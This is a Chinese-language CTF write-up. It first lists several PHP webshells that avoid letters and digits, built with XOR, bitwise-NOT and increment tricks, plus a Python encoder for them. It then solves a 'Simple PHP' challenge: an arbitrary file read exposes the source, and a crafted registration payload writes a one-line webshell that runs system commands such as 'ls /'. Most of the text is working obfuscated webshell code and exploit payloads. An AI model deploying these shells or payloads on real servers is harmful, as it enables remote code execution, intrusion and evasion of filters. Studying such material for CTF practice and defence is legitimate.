方法一:异或
1
2
3
4
5
6
| <?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');
$___=$$__;
$_($___[_]);
|
1
2
3
4
5
6
| <?php
$_ = "!((%)("^"@[[@[\\";
$__ = "!+/(("^"~{`{|";
$___ = $$__;
$_($___[_]);
|
方法二:取反
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| <?php
$_++;
$__ = "极";
$___ = ~($__{$_});
$__ = "区";
$___ .= ~($__{$_});
$___ .= ~($__{$_});
$__ = "皮";
$___ .= ~($__{$_});
$__ = "十";
$___ .= ~($__{$_});
$__ = "勺";
$___ .= ~($__{$_});
$____ = '_';
$__ = "寸";
$____ .= ~($__{$_});
$__ = "小";
$____ .= ~($__{$_});
$__ = "欠";
$____ .= ~($__{$_});
$__ = "立";
$____ .= ~($__{$_});
$_ = $$____;
$___($_[_]);
|
1
2
3
4
5
6
7
8
9
10
11
12
| <?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| def get(shell):
hexbit=''.join(map(lambda x: hex(~(-(256-ord(x)))),shell))
hexbit = hexbit.replace('0x','%')
print(hexbit)
get('assert')
get('_POST')
<?php
$_ = ~"%9e%8c%8c%9a%8d%8b";
$__ = ~"%a0%af%b0%ac%ab";
$___ = $$__;
$_($___[_]);
|
方法三:自增
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| <?php
$_=[].'';
$___ = $_[$__];
$__ = $___;
$_ = $___;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___ .= $__;
$___ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;
$___ .= $__;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++;
$___ .= $__;
$__++;$__++;
$___ .= $__;
$__ = $_;
$____ = "_";
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____ .= $__;
$__++;$__++;$__++;$__++;
$____ .= $__;
$__++;
$____ .= $__;
$_ = $$____;
$___($_[_]);
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| <?php
$_=[];
$_=@"$_";
$_=$_['!'=='@'];
$___=$_;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$_=$$____;
$___($_[_]);
|
Simple PHP
题目首页是一个注册和登录界面,先随便注册一个,登陆进去后试一试功能
可以发现一个打开图片的功能,抓包看看请求参数
这里的image参数会造成任意文件读取,读一下index的源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| index.php
<?php
error_reporting(0);
if(isset($_POST['user']) && isset($_POST['pass'])){
$hash_user = md5($_POST['user']);
$hash_pass = 'zsf'.md5($_POST['pass']);
if(isset($_POST['punctuation'])){
if (strlen($_POST['user']) > 6){
echo("<script>alert('Username is too long!');</script>");
}
elseif(strlen($_POST['website']) > 25){
echo("<script>alert('Website is too long!');</script>");
}
elseif(strlen($_POST['punctuation']) > 1000){
echo("<script>alert('Punctuation is too long!');</script>");
}
else{
if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){
if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){
$_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);
$template = file_get_contents('./template.html');
$content = str_replace("__USER__", $_POST['user'], $template);
$content = str_replace("__PASS__", $hash_pass, $content);
$content = str_replace("__WEBSITE__", $_POST['website'], $content);
$content = str_replace("__PUNC__", $_POST['punctuation'], $content);
file_put_contents('sandbox/'.$hash_user.'.php', $content);
echo("<script>alert('Successed!');</script>");
}
else{
echo("<script>alert('Invalid chars in website!');</script>");
}
}
else{
echo("<script>alert('Invalid chars in username!');</script>");
}
}
}
else{
setcookie("user", $_POST['user'], time()+3600);
setcookie("pass", $hash_pass, time()+3600);
Header("Location:sandbox/$hash_user.php");
}
}
?>
|
注意index.php中的一个危险函数file_put_contents,如果我们在$content中写入恶意php代码,而$content是由我们向template.html中进行某些变量赋值生成的,这里读取一下模板文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| template.html
<?php
error_reporting(0);
$user = ((string)__USER__);
$pass = ((string)__PASS__);
if(isset($_COOKIE['user']) && isset($_COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass)
{
echo($_COOKIE['user']);
}
else{
die("<script>alert('Permission denied!');</script>");
}
?>
......
<a href="#" class="powered_by">__PUNC__</a>
......
<li class="desktop_icon" id="win16" path="__WEBSITE__">
......
|
可以看到四个参数的位置,从user开始就进入了php代码,我们可以写一个一句话木马,但是index中对于注册的信息有所过滤,我们可以控制的参数有user,pass,website,punctuation,但是pass经过md5加密以及字符串拼接,无法利用
剩下user有字符串长度不大于6的限制,无法写入一句话木马,而punctuation字符串长度上限为1000,但不能有大小写字母和数字以及>,这里可以在user中来闭合,并且注释后续代码,让后面一个参数__PUNC__也可以写入php代码,再用注释来解决后续代码即可
这里的__PUNC__需要用到无数字字母webshell,参考链接如下
(141条消息) 无字母数字webshell总结_zkzq的博客-CSDN博客_无字符webshell
一些不包含数字和字母的webshell | 离别歌 (leavesongs.com)
网上还有一个不包含数字和字母的webshell,这里记录一下
1
| user=1)/*&pass=rr&website=&punctuation=*/;@$_%2b%2b;$__='#./|{'^'|~`//';${$__}[!$_](${$__}[$_]);/*
|
查看根目录
1
| 0=assert&1=system("ls /");
|
传马直接读flag即可
